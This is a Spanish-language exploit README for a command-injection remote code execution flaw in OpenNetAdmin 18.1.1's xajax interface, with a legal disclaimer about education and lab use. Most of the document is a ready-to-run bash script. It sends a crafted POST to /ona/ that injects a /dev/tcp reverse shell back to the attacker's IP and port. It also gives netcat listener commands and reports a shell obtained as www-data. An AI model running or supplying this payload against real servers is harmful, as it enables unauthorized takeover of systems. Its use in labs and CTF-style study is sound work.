
⚠️ Aviso legal
Este repositorio está destinado estrictamente solo a fines educativos y de investigación.
La información y el código aquí proporcionados pueden utilizarse en entornos controlados, como máquinas de laboratorio privadas.
El uso no autorizado de este código contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético.
El autor no es responsable de ningún uso indebido o daño causado.
Existe una vulnerabilidad de ejecución remota de código en OpenNetAdmin 18.1.1 a través de la interfaz de solicitudes AJAX xajax.
La vulnerabilidad se debe a una sanitización incorrecta de las entradas, lo que permite la inyección de comandos mediante una solicitud POST manipulada a /ona/.
Este exploit aprovecha el plugin tooltips para lanzar una reverse shell de vuelta al listener del atacante.
xajaxargs[]curl)Este one-liner de Bash personalizado envía una solicitud POST al endpoint vulnerable xajax=window_submit con código de reverse shell inyectado.
#!/bin/bash
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
🛠️ Nota:
Reemplaza<YOUR-IP>y<YOUR-PORT>con la IP y el puerto de tu listener de Netcat.
Inicia tu listener usando:
nc -nlvp <PORT>

Captura de pantalla de la interfaz y la versión de OpenNetAdmin vulnerable.
bash shell.sh

Captura de pantalla de la ejecución del script que dispara el payload.
nc -nlvp <PORT>

Reverse shell capturada como
www-data.
Consulta el análisis detallado y la teoría en mi publicación de Medium:
👉 Lee el blog en Medium